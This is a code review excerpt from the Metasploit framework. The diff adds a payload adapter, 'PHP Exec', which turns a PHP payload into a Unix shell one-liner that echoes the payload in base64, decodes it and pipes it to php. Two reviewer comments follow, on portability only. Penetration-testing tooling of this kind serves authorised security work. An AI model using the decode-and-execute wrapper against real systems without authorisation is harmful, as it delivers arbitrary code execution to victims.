modules/payloads/adapters/cmd/unix/php.rb

```diff
@@ -0,0 +1,38 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PHP Exec',
+        'Description' => 'Execute a PHP payload from a command',
+        'Author' => ['Spencer McIntyre', 'msutovsky-r7'],
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_PHP,
+        'AdaptedPlatform' => 'php'
+      )
+    )
+  end
+
+  def compatible?(mod)
+    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
+      return false
+    end
+
+    super
+  end
+
+  def generate(_opts = {})
+    payload = super
+
+    "echo '#{Base64.strict_encode64(payload)}'|base64 -d|exec $(which php)"
```

Comment:
You might want to take a look at `modules/encoders/cmd/base64.rb` to make this a bit more portable I think.

Reply:
Also, `which` isn't portable, I think that `command -v` is the way to go